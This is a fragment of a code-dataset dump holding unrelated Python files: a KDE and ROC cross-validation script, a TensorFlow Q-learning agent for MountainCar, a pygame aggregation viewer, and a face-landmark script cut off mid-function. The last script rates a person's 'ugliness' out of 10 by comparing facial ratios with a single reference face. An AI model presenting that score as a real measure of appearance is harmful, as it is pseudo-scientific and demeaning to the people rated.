list_of_folds = df_folds\n \n e.g. plotAverageRPC(df_folds)\n \n '''\n all_tpr = []\n all_fpr = []\n \n # create new dataframe from df_folds\n for fold in df_folds:\n \n # extract FPR and TPR as array and add \n all_tpr.append(fold.TPR)\n all_fpr.append(fold.FPR)\n \n all_tpr = np.transpose(np.array(all_tpr,dtype=float))\n all_fpr = np.transpose(np.array(all_fpr,dtype=float))\n \n avg_tpr = []\n avg_fpr = []\n # calculate averages\n for i in range(all_tpr.shape[0]):\n avg_tpr.append(np.nanmean(all_tpr[i,:]))\n avg_fpr.append(np.nanmean(all_fpr[i,:]))\n \n # plot ROC\n plt.plot(avg_fpr, avg_tpr,c='k',s = 1)\n plt.plot(np.linspace(0,1),np.linspace(0,1),c='lightgrey')\n plt.title('ROC curve from {0} fold stratified cross validation'.format(len(df_folds)))\n plt.xlabel('FPR')\n plt.ylabel('TPR')\n\n\n\n\n\n\n\ndef plotAllFoldsROC(list_of_folds):\n \n fig, ax = plt.subplots()\n \n # calc average tpr and fpr from all folds --------------------\n all_tpr = []\n all_fpr = []\n aucs = []\n # create new dataframe from df_folds\n for fold in df_folds:\n \n # extract FPR and TPR as array and add \n all_tpr.append(np.array(fold.loc[:,'TPR'],dtype=float))\n all_fpr.append(np.array(fold.loc[:,'FPR'],dtype=float))\n# =============================================================================\n# all_tpr.append(interp(np.linspace(0,1,400), np.array(fold.loc[:,'FPR'],dtype=float), np.array(fold.loc[:,'TPR'],dtype=float)))\n# all_tpr[-1][0] = 0.0\n# roc_auc = auc(np.array(fold.loc[:,'FPR'],dtype=float), np.array(fold.loc[:,'TPR'],dtype=float))\n# aucs.append(roc_auc)\n# \n# mean_tpr = np.mean(all_tpr, axis=0)\n# mean_tpr[-1] = 1.0 # ignore\n# mean_auc = auc(np.linspace(0,1,400), mean_tpr)\n# std_auc = np.std(aucs)\n# plt.plot(np.linspace(0,1,400), mean_tpr, color='b',\n# label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_auc, std_auc),\n# lw=2, alpha=.8)\n# \n# std_tpr = np.std(all_tpr, axis=0)\n# tprs_upper = np.minimum(mean_tpr + std_tpr, 1)\n# tprs_lower = np.maximum(mean_tpr - std_tpr, 0)\n# plt.fill_between(np.linspace(0,1,400), tprs_lower, tprs_upper, color='grey', alpha=.2,\n# label=r'$\\pm$ 1 std. dev.')\n# =============================================================================\n \n \n #all_tpr = np.array(fold.loc[:,'TPR'],dtype=float)\n #all_fpr = np.array(fold.loc[:,'FPR'],dtype=float)\n \n avg_tpr = np.mean(all_tpr, axis=0)\n avg_fpr = np.mean(all_fpr, axis=0)\n \n \n\n #avg_tpr = []\n #avg_fpr = []\n # calculate averages \n #for i in range(all_tpr.shape[0]):\n # avg_tpr.append(np.nanmean(all_tpr[i,:]))\n # avg_fpr.append(np.nanmean(all_fpr[i,:]))\n\n #plot average\n ax.plot(np.sort(avg_fpr), np.sort(avg_tpr),c='k',lw=1.6,label='Mean: AUC={0:.2f}'.format(auc(avg_fpr[61:],avg_tpr[61:],reorder=True)))\n \n std_tpr = np.std(all_tpr, axis=0)\n std_fpr = np.std(all_fpr, axis=0)\n \n #tprs_upper = avg_tpr + std_tpr\n #fprs_upper = avg_fpr + std_fpr\n\n #tprs_lower = avg_tpr - std_tpr\n #fprs_lower = avg_fpr - std_fpr\n \n #plt.plot(fprs_lower,tprs_lower,ls='--')\n #plt.plot(fprs_upper,tprs_upper,ls='--')\n\n #plt.fill_between(avg_fpr, tprs_lower, tprs_upper, color='grey', alpha=.2,\n # label=r'$\\pm$ 1 std. dev.')\n # std deviation for TPR --------------------\n #print(all_tpr.shape)\n #std_tprs = []\n #std_fprs = []\n #for r in range(all_tpr.shape[0]):\n # std_tprs.append(np.std(all_tpr[r,:]))\n # std_fprs.append(np.std(all_fpr[r,:]))\n \n \n # std dev bounds -----------------------\n #upper_t = np.array(avg_tpr) + np.array(std_tprs) \n #lower_t = np.array(avg_tpr) - np.array(std_tprs) \n #upper_f = np.array(avg_fpr) + np.array(std_fprs)\n #lower_f = np.array(avg_fpr) - np.array(std_fprs)\n \n \n \n \n # plot bounds\n #plt.fill_between(avg_fpr, lower_t, upper_t, color='grey', alpha=.2,label=r'$\\pm$ 1 std. dev.')\n #plt.fill_between(avg_fpr, lower_f, upper_f, color='grey', alpha=.2)\n \n \n \n # plot each fold\n for i,fold in enumerate(list_of_folds):\n roc_auc = auc(np.array(fold.loc[:,'FPR'],dtype=float), np.array(fold.loc[:,'TPR'],dtype=float),reorder=True)\n ax.plot(np.sort(fold.FPR),np.sort(fold.TPR),lw=0.4,label = 'Fold {1}: AUC={0:.2f}'.format(roc_auc,i+1),ls='-')\n \n \n ax.plot(np.linspace(0,1),np.linspace(0,1),c='lightgrey')\n ax.set_xlabel(\"FPR\",fontsize=11)\n ax.set_ylabel(\"TPR\",fontsize=11)\n ax.legend(fontsize=11)\n fig.savefig('/Users/thomasdrayton/Desktop/roc_complete_fld_cv10.png',format='png',dpi=400)\n \n#%% \n\n#plotAllFoldsROC(df_folds)\n\n#fig.clear(all)\n# =============================================================================\n# #%% plotting each contour with a timer\n# contourPlot(xx,yy,log_rr,fold_count,'',data=None)\n# plotDB(contSet[1],n_X_test,f_X_test,l='+',pause_time=2)\n# #%%\n# contourPlot(xx,yy,log_rr,fold_count,'',data=None)\n# \n# #%%\n# contourPlot(xx,yy,zz_f,fold_count,data=f_X_train,'f_X_train')\n# contourPlot(xx,yy,zz_n,fold_count,data=n_X_train,'n_X_train')\n# #%%\n# surfacePlot(xx,yy,log_rr,fold_count)\n# =============================================================================\n#%% Data preparation\n\n# Data after running Fisher's Linear Discriminant for hand labels\nnormal = np.real(normal)\nfaulty = np.real(faulty)\n\n\n# Data after running PCA on hand labelled P curve\n#normal = norm.values\n#faulty = fnorm.values\n\n\n# prepare data for cross validation\nfld_data = np.vstack((normal,faulty))\nX = fld_data[:,[0,1]]\ny = fld_data[:,2]\n\n\n\n\n#%% Initialise parameters to suit data \n\n# Change mesh so it comrresponds to dimensions of data space\nxmesh = [-0.51,0.2,1000j] # MAKE SURE CORRECT BY LOOKING AT MIN AND MAX OF SUBSPACE AXES\nymesh = [-0.51,0.07,1000j]\n\n\n# Instantiate stratified kfold cross validation\nk = 5 # increase this to 10 fold to see any changes\ncv = StratifiedKFold(n_splits=k) \n\n# dataframe to store results for each fold\ndf_folds = []\n\n\nfold_count = 0\nfor train, test in cv.split(X, y):\n\n # Create current train and test data\n X_train = X[train,:]\n X_test = X[test,:]\n y_train = y[train]\n y_test = y[test]\n \n # faulty and normal data for training and testing for the current fold\n f_X_train = X_train[np.where(y_train==0),:][0]\n n_X_train = X_train[np.where(y_train==1),:][0]\n \n f_X_test = X_test[np.where(y_test==0),:][0]\n n_X_test = X_test[np.where(y_test==1),:][0]\n \n \n \n # Log-likelihood on training data --------------------------------------\n \n # bandwdith for faulty data\n fb = findKDEbandwidth(np.linspace(0, 0.09,200),f_X_train,'Faulty')\n \n # Perform kDE on faulty using using dimensions of plot\n xx, yy, zz_f = kde2D(f_X_train[:,0],\n f_X_train[:,1],\n bandwidth=fb.best_params_['bandwidth'],\n x_mesh=xmesh, \n y_mesh=ymesh)\n \n # Anything below 10^(-5) is 10^(-5)\n zz_f = levelKDE(zz_f)\n \n # bandwdith for normal data\n fb = findKDEbandwidth(np.linspace(0.0, 0.055,50),n_X_train,'Normal') # need to tune bandwidth search range for difference data\n # for cv= 5, let np.linspace(0, 0.02,20) to speed up\n # Perform kDE on normal using using dimensions of plot\n xx, yy, zz_n = kde2D(n_X_train[:,0],\n n_X_train[:,1],\n bandwidth=fb.best_params_['bandwidth'],\n x_mesh=xmesh, \n y_mesh=ymesh)\n \n # Anything below 10^(-5) is 10^(-5)\n zz_n = levelKDE(zz_n)\n \n \n # Log likelihood of the relative risk\n log_rr = np.log(zz_f/zz_n)\n \n \n # plot\n #contourPlot(xx,yy,log_rr,fold_count,'',data=None) # make it so that all plots are shown in a single figure\n #surfacePlot(xx,yy,log_rr,fold_count)\n \n \n #df_folds.append(evalutateThresholds(xx,yy,log_rr,\n # normal = n_X_test,\n # faulty = f_X_test,\n # k = fold_count+1))\n \n \n # Evaluation--------------------------------------------------------------\n \n # All levels to iterate through: from -ve to +ve\n #all_lvls = np.array([np.linspace(0.01,np.max(log_rr),100) ]) # positive levels\n #all_lvls = np.array([np.linspace(np.min(log_rr),-0.001,100)]) # negative levels\n all_lvls = np.array([np.linspace(np.min(log_rr),-0.001,100),np.linspace(0.001,np.max(log_rr),100) ])\n\n\n # create df\n cols = ['Level','Fold','TN','FN','TP','FP','FPR','TPR','Total','# of datapoints per test']\n df_conM = pd.DataFrame(columns=cols)\n \n # iterate through -ve levels, then +ve levels\n for lvls in all_lvls: \n \n \n # creating contour object to access contour coords\n CS = ax.contour(xx,yy,log_rr,levels=lvls)\n \n \n # close plot the is created\n plt.close('all')\n \n # Contour Set: all contours from each level\n contSet= CS.allsegs\n #break # for dedugging\n \n #if(fold_count==0):\n # break # for dedugging\n #fold_count+=1 # delete - just for debugging\n #%%\n # and each group of contour in that level\n for lvl in range(len(contSet)):\n\n TP = 0 # Reset true positives for current level [normal data]\n FP = 0 # Reset false positives for current level [normal data]\n TN = 0 # Reset true negatives for current level [faulty data]\n FN = 0 # Reset false positives for current level [normal data]\n \n \n # Are any of the contours inside each other? If so which ones\n cont_num = range(len(contSet[lvl])) # number of contours -----------\n conts_inside = [] # list for contours within each other This can be a function that takes contSet[lvl] as an input\n for c in itertools.combinations(cont_num,2):\n # check if contours are inside each other\n contour1 = contSet[lvl][c[0]]\n contour2 = contSet[lvl][c[1]]\n #print(c)\n path1 = mpltPath.Path(contour1)\n path2 = mpltPath.Path(contour2)\n \n if(path1.contains_path(path2)):\n # path2 is inside path1\n conts_inside.append(c)\n \n elif(path2.contains_path(path1)):\n # path1 is inside path2 and returns conts_inside\n conts_inside.append(c) # ------------ \n #break\n #%%\n \n \n for contour in range(len(contSet[lvl])): # goes through every contour at current level\n \n # reset flag so that \n flag = 0\n \n #list for encapsulating contour\n encap_cont = []\n \n # Create a path for the current contour\n path = mpltPath.Path(contSet[lvl][contour])\n \n # check if at one contour inside another one\n for i in conts_inside: # likely to only be 1 contour inside another but a for loop is used just incase there is more than 1\n \n if(i[0]==contour): # check if the current contour is the ones that encapulates other contours\n \n # set flag so that points not counted again\n flag = 1\n \n # all points within add them [already got that code] ----------------------\n f_inside = [] # function that takes a TN,FN...,path and returns TN,FN... \n n_inside = []\n \n if((lvls[lvl] < 0) and not(i[0] in encap_cont)): # -ve levels\n # Check to see which normal points are within contour\n n_inside = path.contains_points(n_X_test)\n \n # Check to see which faulty points are within contour\n f_inside = path.contains_points(f_X_test)\n \n # number of normal points in contour\n TP += np.sum(n_inside)\n \n # number of faulty points in contour\n FP += np.sum(f_inside)\n #print('here1')\n \n \n \n elif((lvls[lvl] > 0) and not(i[0] in encap_cont)): # +ve levels\n \n # Check to see which faulty points are within contour\n f_inside = path.contains_points(f_X_test)\n \n # Check to see which normal points are within contour\n n_inside = path.contains_points(n_X_test)\n \n # number of faulty points in contour\n TN += np.sum(f_inside)\n \n # number of normal points in contour\n FN += np.sum(n_inside) # ---------------------- function returns TN,FN...\n #print('here2')\n \n # add contour number to list so that it's not added again\n encap_cont.append(i[0])\n \n # next iteration\n continue\n \n if(i[1]==contour): # check if inner contour is current contour\n # -----------------------\n # set flag so that points not counted again\n flag = 1\n \n # values inside contour need to be subtracted same function but subtracts\n if(lvls[lvl] < 0): # -ve levels\n # Check to see which normal points are within contour\n n_inside = path.contains_points(n_X_test)\n \n # Check to see which faulty points are within contour\n f_inside = path.contains_points(f_X_test)\n \n # number of normal points in contour\n TP -= np.sum(n_inside)\n \n # number of faulty points in contour\n FP -= np.sum(f_inside)\n #print('here1')\n \n \n \n elif(lvls[lvl] > 0): # +ve levels\n \n # Check to see which faulty points are within contour\n f_inside = path.contains_points(f_X_test)\n \n # Check to see which normal points are within contour\n n_inside = path.contains_points(n_X_test)\n \n # number of faulty points in contour\n TN -= np.sum(f_inside)\n \n # number of normal points in contour\n FN -= np.sum(n_inside) # function returns TN,FN...\n #print('here2') ------------------------\n \n \n # counts points inside contour - same function as before as before\n # all points within add them [already got that code] ----------------------\n f_inside = [] # function that takes a TN,FN...,path and returns TN,FN... \n n_inside = []\n \n # if no inner contours - if flag not set - go into [i.e. flag is set if contour has been previously counted]\n if(flag==0):\n if(lvls[lvl] < 0): # -ve levels\n # Check to see which normal points are within contour\n n_inside = path.contains_points(n_X_test)\n \n # Check to see which faulty points are within contour\n f_inside = path.contains_points(f_X_test)\n \n # number of normal points in contour\n TP += np.sum(n_inside)\n \n # number of faulty points in contour\n FP += np.sum(f_inside)\n #print('here1')\n \n \n \n elif(lvls[lvl] > 0): # +ve levels\n \n # Check to see which faulty points are within contour \n f_inside = path.contains_points(f_X_test) \n \n # Check to see which normal points are within contour\n n_inside = path.contains_points(n_X_test)\n \n # number of faulty points in contour\n TN += np.sum(f_inside)\n \n # number of normal points in contour\n FN += np.sum(n_inside) # ---------------------- function returns TN,FN...\n #print('here2')\n \n \n # calculate points outside contours\n if(lvls[lvl] < 0): # -ve levels\n FN = n_X_test.shape[0] - TP # number of normal points outside contour\n TN = f_X_test.shape[0] - FP # number of faulty points outside contour\n elif(lvls[lvl] > 0): # +ve levels\n FP = f_X_test.shape[0] - TN # number of faulty points outside contour\n TP = n_X_test.shape[0] - FN # number of normal points outside contour\n \n # Add to dataframe\n df_conM.loc[lvls[lvl],'Level'] = lvl\n df_conM.loc[lvls[lvl],'Fold'] = fold_count\n df_conM.loc[lvls[lvl],'TN'] = TN\n df_conM.loc[lvls[lvl],'FN'] = FN\n df_conM.loc[lvls[lvl],'FP'] = FP\n df_conM.loc[lvls[lvl],'TP'] = TP\n df_conM.loc[lvls[lvl],'Total'] = TP+FP+TN+FN\n df_conM.loc[lvls[lvl],'# of datapoints per test'] = n_X_test.shape[0]+f_X_test.shape[0]\n\n # If ZeroDivisionError add NaN\n if(((FP==0) and (TN==0))):\n df_conM.loc[lvls[lvl],'FPR'] = np.nan\n else:\n df_conM.loc[lvls[lvl],'FPR'] = FP/np.sum([FP,TN])\n \n # If ZeroDivisionError add NaN\n if(((TP==0) and (FN==0))):\n df_conM.loc[lvls[lvl],'TPR'] = np.nan\n else:\n df_conM.loc[lvls[lvl],'TPR'] = TP/np.sum([TP,FN])\n \n #break # stop after first contour\n #break # stop after first level\n #break # stop after +/- level\n df_folds.append(df_conM)\n if(fold_count==0):break # stop after specified fold\n \n # increment fold count\n fold_count+=1\n\n# concatenate dataframes\ndf_rr_results = pd.concat(df_folds)\n\n\n# Contour plot for ending fold that shows the train data too - alter by changing end break statement\n#contourPlot(xx,yy,log_rr,fold_count,'',data=None)\n#plt.scatter(f_X_train[:,0],f_X_train[:,1],marker='x',s=50,color='gold',linewidth=0.9) # faulty points\n#plt.scatter(n_X_train[:,0],n_X_train[:,1],marker='^',s=5,facecolor='None',edgecolors='darkblue',linewidths=0.2) # faulty points\n\n\n#%% Plot ROC curves for each fold\n#plotAllFoldsROC(df_folds)\n\n\n#%% Average ROC form all folds\n#plotAverageROC(df_folds)\n\n\n#%% Plotting decision boundary at specified level_idx of current contSet variable\n#plotCleanDB(contSet,1,f_X_test,n_X_test,'+')\n\n\n#contourPlot(xx,yy,log_rr,fold_count,'',data=None) # make it so that all plots are shown in a single figure\n\n#surfacePlot(xx,yy,log_rr,fold_count)\n\n#animateSurface(xx,yy,log_rr,fold_count)\n\n \n\n#%%\n\n#contourPlot(xx,yy,zz_f/zz_n,fold_count,'',data1=f_X_train,data2=n_X_train) # make it so that all plots are shown in a single figure\n#contourPlot(xx,yy,log_rr,fold_count,'',data1=f_X_train,data2=n_X_train) \n#%%\n#fig,ax = plt.subplots(1,2,squeeze=False,figsize=(12,5))\n#cf = ax[0][0].contourf(xx,yy,zz_f/zz_n,levels=15,cmap=cm.plasma) \n#ax[0][0].scatter(n_X_train[:,0], n_X_train[:,1], marker = 'o', s=20,edgecolor='black',linewidth=0.7,facecolor='None')\n#ax[0][0].scatter(f_X_train[:,0], f_X_train[:,1], marker = 'x', s=70,c='white',linewidth=1.5)\n#fig.colorbar(cf)\n#ax.set_title(\"Faulty/Normal Log-likelihood: Fold {0}\".format(fold_count+1))\n#ax[0][0].tick_params(axis='both',labelsize=12)\n#ax[0][1].tick_params(axis='both',labelsize=12)\n\n#%%\n#fig.savefig('/Users/thomasdrayton/Desktop/LR_vs_logLR.png',format='png',dpi=400)\n\n\n\n#%%\n\n# =============================================================================\n# \n# # Create some random data, I took this piece from here:\n# # http://matplotlib.org/mpl_examples/mplot3d/scatter3d_demo.py\n# def randrange(n, vmin, vmax):\n# return (vmax - vmin) * np.random.rand(n) + vmin\n# n = 100\n# xx = randrange(n, 23, 32)\n# yy = randrange(n, 0, 100)\n# zz = randrange(n, -50, -25)\n# \n# # Create a figure and a 3D Axes\n# fig = plt.figure()\n# ax = Axes3D(fig)\n# \n# # Create an init function and the animate functions.\n# # Both are explained in the tutorial. Since we are changing\n# # the the elevation and azimuth and no objects are really\n# # changed on the plot we don't have to return anything from\n# # the init and animate function. (return value is explained\n# # in the tutorial.\n# def init():\n# ax.scatter(xx, yy, zz, marker='o', s=20, c=\"goldenrod\", alpha=0.6)\n# return fig,\n# \n# def animate(i):\n# ax.view_init(elev=10., azim=i)\n# return fig,\n# \n# # Animate\n# anim = animation.FuncAnimation(fig, animate, init_func=init,\n# frames=360, interval=20, blit=True)\n# \n# anim.save('/Users/thomasdrayton/Desktop//basic_animation.mp4', fps=30, writer='ffmpeg')\n# =============================================================================\n\n\n#%%\n\n\ndef init():\n ax.plot_surface(xx,yy,log_rr,antialiased=False,\n cmap=cm.plasma,\n alpha=1)\n return fig,\n\n\ndef animate(i):\n ax.view_init(elev=30., azim=i)\n return fig,\n\n\n \nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\n# Animate\nanim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=360, interval=20, blit=True)\n#%\nanim.save('/Users/thomasdrayton/Desktop//basic_animation_600.mp4', fps=30, dpi=600,bitrate=10000)\n \n","repo_name":"bittahbandit/FYP-Scripts","sub_path":"relative_risk_v2.py","file_name":"relative_risk_v2.py","file_ext":"py","file_size_in_byte":39144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2798871075","text":"from __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport gym\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python import debug as tf_debug\n\nkEpisode = 9000\nkEpsilon = 0.2\nkAlpha = 0.01\nkGammar = 1\n\n\nclass QNetwork:\n space_action = None\n q_label = None\n train_op = None\n q = None\n init = None\n loss = None\n g_v = None\n\n def __init__(self):\n self.space_action = tf.placeholder(dtype = tf.float32, shape=[None,6])\n self.q_label = tf.placeholder(dtype = tf.float32, shape=[None])\n self.create_net()\n self.init = tf.initialize_all_variables()\n\n\n def create_net(self):\n w1 = tf.get_variable(\"w1\", shape = [6,10], \n # initializer=tf.constant_initializer(0.0))\n initializer=tf.random_normal_initializer(stddev=1/60))\n b1 = tf.get_variable('b1', shape=[10], \n initializer=tf.constant_initializer(0.0))\n # w2 = tf.get_variable(\"w2\", shape=[10,10],\n # initializer=tf.random_normal_initializer())\n w3 = tf.get_variable(\"w3\", shape=[10,1],\n # initializer=tf.constant_initializer(0.0))\n initializer=tf.random_normal_initializer(stddev=1/10))\n b3 = tf.get_variable('b3', shape=[1], \n initializer=tf.constant_initializer(0.0))\n l1 = tf.nn.relu(tf.matmul(self.space_action, w1)+b1)\n # l1 = tf.matmul(self.space_action, w1)+b1\n # l2 = tf.nn.relu(tf.matmul(l1, w3))\n self.q = tf.matmul(l1, w3)+b3\n # self.q = tf.matmul([self.space_action], w3)+b3\n weight_norm = tf.reduce_sum(0.00001*tf.convert_to_tensor([\n tf.nn.l2_loss(i) for i in [\n tf.get_collection('w1'), \n tf.get_collection('w3')]]))\n self.loss = tf.reduce_mean(tf.square(self.q_label-self.q))+weight_norm\n \n opt= tf.train.AdamOptimizer(\n kAlpha)\n self.g_v = opt.compute_gradients(self.loss)\n self.train_op = opt.apply_gradients(self.g_v)\n\ndef buildFeature(space, action):\n feature = np.zeros(6)\n space_ = np.zeros(2)\n space_[0] = space[0]+0.5\n space_[1] = space[1]/0.07\n feature[action*2: action*2+2] = space_\n return feature\n\ndef Qvalue(space, action, qnet, session):\n feature = buildFeature(space, action)\n q_value = session.run([qnet.q], feed_dict={qnet.space_action: [feature]})\n return q_value\n\ndef epsilonGreedy(space, qnet, session):\n if np.random.uniform(0,1)< 1- kEpsilon:\n Qlist = []\n for a in range(0,3):\n feature = buildFeature(space, a)\n # print(feature)\n q_value = session.run([qnet.q], feed_dict={qnet.space_action: \n [feature]})\n Qlist.append(q_value)\n action=np.random.choice(np.flatnonzero(\n np.array(Qlist) == np.array(Qlist).max()))\n else:\n action = np.random.randint(low=0, high=3)\n return action\n\n# def updateW(space, action, delta, w):\n# feature = np.append(space, action)\n# # feature[1] = feature[1]/0.07\n# # feature[0] = feature[0]/1.2\n# return w + kAlpha*delta*feature\n\ndef main():\n # w = (np.random.random([5])-0.5)*20\n gym.envs.register(\n id='MountainCarMyEasyVersion-v0',\n entry_point='gym.envs.classic_control:MountainCarEnv',\n max_episode_steps=1000, # MountainCar-v0 uses 200\n # reward_threshold=-110.0,\n )\n env = gym.make('MountainCarMyEasyVersion-v0')\n # env = gym.make('MountainCar-v0')\n ExpBuffer = []\n schedule = 0\n qnet = QNetwork()\n with tf.Session() as sess:\n # sess = tf_debug.LocalCLIDebugWrapperSession(sess)\n # sess.add_tensor_filter(\"has_inf_or_nan\", tf_debug.has_inf_or_nan)\n sess.run([qnet.init])\n for eps in range(kEpisode):\n print('EPS %d:'%(eps))\n space = env.reset()\n count = 0\n while True:\n env.render()\n action = epsilonGreedy(space, qnet, sess)\n space_, reward, done, _ =env.step(action)\n ExpBuffer.append((space, action, reward, space_))\n schedule = schedule + 1\n if schedule==200:\n sample = np.random.permutation(range(200))\n sample_id = sample[0:64]\n feature = []\n q_label = [] \n for id_ in sample_id:\n space, action, reward, space_ = ExpBuffer[id_]\n Qlist=[]\n for a in range(0, 3):\n Qlist.append(Qvalue(space_, a, qnet, sess))\n if space_[0]>=0.5:\n q_label.append(reward)\n else:\n q_label.append(reward+kGammar*np.max(np.array(Qlist)))\n \n feature.append(buildFeature(space, action))\n # print(feature)\n _, loss_, q_ = sess.run([qnet.train_op, qnet.loss, qnet.q], feed_dict={qnet.space_action:\n np.array(feature), qnet.q_label: np.array(q_label)})\n print(loss_)\n # print(q_)\n schedule = 0\n space = space_\n count = count + 1\n if done:\n print(count)\n break\n\n\n\n\nif __name__=='__main__':\n main()","repo_name":"heiscsy/reinforcement_learning_ucl","sub_path":"FA/MountainCar/linear_sarsa.py","file_name":"linear_sarsa.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5667842095","text":"from MyMaths import *\nimport math\nimport sys\nimport pygame\nimport time\nimport TimeTest\nimport random\n\n\npygame.init()\npygame.font.init()\nmyfont = pygame.font.SysFont('Comic Sans MS', 30)\n\nsize = [600, 600]\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Diffusion Limited Aggregation Viewer\")\n\n\nwalker_color = (255, 255, 255)\nwalker_size = 4\n\n\ntree = []\ntry:\n # importing tree from file\n file = open(\"tree.txt\", \"r\")\n lines = file.readlines()\n file.close()\n\n for line in lines:\n coordinates = line.split(\" \")\n coordinates[1] = coordinates[1].replace(\"\\n\", \"\")\n pos = Vec2(int(float(coordinates[0])), int(float(coordinates[1])))\n tree.append(pos)\nexcept:\n pass\n\n\ndef draw():\n global tree\n screen.fill((0, 0, 0))\n for w in tree:\n color_array = [0, 0, 0]\n\n # color manipulation\n dist = abs(w - Vec2(300, 300))\n color_array[0] = dist / 300 * 255\n color_array[1] = (300 - dist) / 300 * 255\n\n color_array = [int(j) for j in color_array]\n\n for i in range(len(color_array)):\n if color_array[i] > 255:\n color_array[i] = 255\n elif color_array[i] < 0:\n color_array[i] = 0\n\n color = tuple(color_array)\n pygame.draw.circle(screen, color, tuple(w), walker_size)\n pygame.display.flip()\n\n\nmy_loop = True\nwhile my_loop:\n # event handling\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n my_loop = False\n\n draw()\n","repo_name":"Mo0dy/Code4Fun","sub_path":"Projects/DiffusionViewer.py","file_name":"DiffusionViewer.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"18193843291","text":"import math\nimport cv2\nimport dlib\nimport os\nimport matplotlib.pyplot as plt\n\n# landmarks that define the human face\n\n# JAW\nJAW_POINTS = [0, 16]\nLEFT_JAW_POINTS = [0, 7]\nRIGHT_JAW_POINTS = [9, 16]\n\n# Eyebrows\nRIGHT_EYEBROW_POINTS = [22, 26]\nLEFT_EYEBROW_POINTS = [17, 21]\n\n# Nose\nNOSE_POINTS = [27, 35]\nLEFT_NOSE_POINTS = [31, 33]\nRIGHT_NOSE_POINTS = [34, 36]\n\n# Eyes\nLEFT_EYE_POINTS = [36, 41]\nRIGHT_EYE_POINTS = [42, 47]\n\n# Mouths\nMOUTH_POINTS = [48, 60]\nRIGHT_MOUTH_POINTS = [52, 53, 54, 55, 56]\nLEFT_MOUTH_POINTS = [48, 49, 50, 58, 59]\n\n# Lips\nLIPS_POINTS = [61, 67]\nLEFT_LIPS_POINTS = [60, 61, 67]\nRIGHT_LIPS_POINTS = [63, 64, 65]\n\nSYMMETRY_LINE_POINTS = [27, 28, 29, 30, 33, 51, 62, 66, 57, 8]\n\nFACE_FEATURES = [\"jaw\",\n \"eyes\",\n \"eye_brows\",\n \"nose\",\n \"mouth\",\n \"lips\"\n ]\n\n# Richard Reference ratio\nRICHARD_RATIO_JAW = 0.84\nRICHARD_RATIO_EYES = 1.239\nRICHARD_RATIO_EYE_BROWS = 2.654\nRICHARD_RATIO_NOSE = 1.288\nRICHARD_RATIO_MOUTH = 0.817\nRICHARD_RATIO_LIPS = 0.797\nRICHARD_RATIO = [RICHARD_RATIO_JAW, RICHARD_RATIO_EYES, RICHARD_RATIO_EYE_BROWS,\n RICHARD_RATIO_NOSE, RICHARD_RATIO_MOUTH, RICHARD_RATIO_LIPS]\n\n\ndef printCoordinate(start, end, landmarks):\n for i in range(start, end):\n x = landmarks.part(i).x\n y = landmarks.part(i).y\n\n print(\"point : \", i, \"x : \", x, \"y : \", y)\n\n\ndef getAllFileInFolder(folderPath):\n imagesPath = []\n\n for root, directories, files in os.walk(folderPath):\n for file in files:\n filePath = os.path.join(root, file)\n if file.endswith(\".png\"):\n imagesPath.append(filePath)\n\n if file.endswith(\".jpg\"):\n imagesPath.append(filePath)\n\n if file.endswith(\".jpeg\"):\n imagesPath.append(filePath)\n\n return imagesPath\n\n\ndef getFaceLandmarks(image):\n # Load the detector\n detector = dlib.get_frontal_face_detector()\n\n # Load the predictor\n predictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\n\n # Change color space\n imageRGB = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n gray = cv2.cvtColor(imageRGB, cv2.COLOR_BGR2GRAY)\n\n faces = detector(imageRGB)\n\n for face in faces:\n x1 = face.left()\n x2 = face.right()\n y1 = face.top()\n y2 = face.bottom()\n\n # cv2.rectangle(img=image, pt1=(x1, y1), pt2=(x2, y2), color=(0, 255, 0), thickness=4)\n\n # Look for the landmarks\n landmarks = predictor(image=gray, box=face)\n\n return landmarks\n\n\ndef getDistance(x1, y1, x2, y2):\n deltaX = x2 - x1\n deltaY = y2 - y1\n\n return math.sqrt(math.pow(deltaX, 2) + math.pow(deltaY, 2))\n\n\ndef estimateUgliness(landmarks):\n personRatioFeaturesList = getAllFaceFeaturesRatio(landmarks)\n faceFeaturesRatio = {}\n faceFeatureRatioList = []\n\n for featureIndex in range(0, len(FACE_FEATURES)):\n personRatio = personRatioFeaturesList[featureIndex]\n\n faceFeature = FACE_FEATURES[featureIndex]\n\n richardRatio = RICHARD_RATIO[featureIndex]\n\n percentageFeature = compareRatio(richardRatio, personRatio)\n\n faceFeaturesRatio[faceFeature] = percentageFeature\n\n faceFeatureRatioList.append(percentageFeature)\n\n beautyPercentage = averageValue(faceFeatureRatioList)\n uglinessPercentage = 100 - beautyPercentage\n\n return uglinessPercentage\n\n\ndef getUglinessFromImage(imagePath):\n name = getFileName(imagePath)\n\n image = cv2.imread(imagePath)\n\n personLandmarks = getFaceLandmarks(image)\n\n personUglinessPercentage = estimateUgliness(personLandmarks)\n\n personUglinessOn10 = percentageTo10(personUglinessPercentage)\n\n return personUglinessOn10\n\n\ndef getFileName(filePath):\n filename = os.path.basename(filePath)\n separator = '.'\n name = filename.split(separator, 1)[0]\n return name\n\n\ndef compareRatio(richardRatio, personRatio):\n if richardRatio > personRatio:\n return round(((100 * personRatio) / richardRatio), 2)\n else:\n return round(((100 * richardRatio) / personRatio), 2)\n\n\ndef drawFeaturesPoint(landmarks, image):\n # Draw the points\n\n for i in range(0, 68):\n x = landmarks.part(i).x\n y = landmarks.part(i).y\n\n # Draw a circle\n cv2.circle(img=image, center=(x, y), radius=4, color=(0, 255, 0), thickness=-1)\n\n\ndef getAllFaceFeaturesRatio(landmarks):\n featureRatio = []\n\n for feature in FACE_FEATURES:\n featureRatio.append(symmetryRatioFaceFeature(landmarks, feature))\n\n return featureRatio\n\n\ndef symmetryRatioFaceFeature(landmarks, 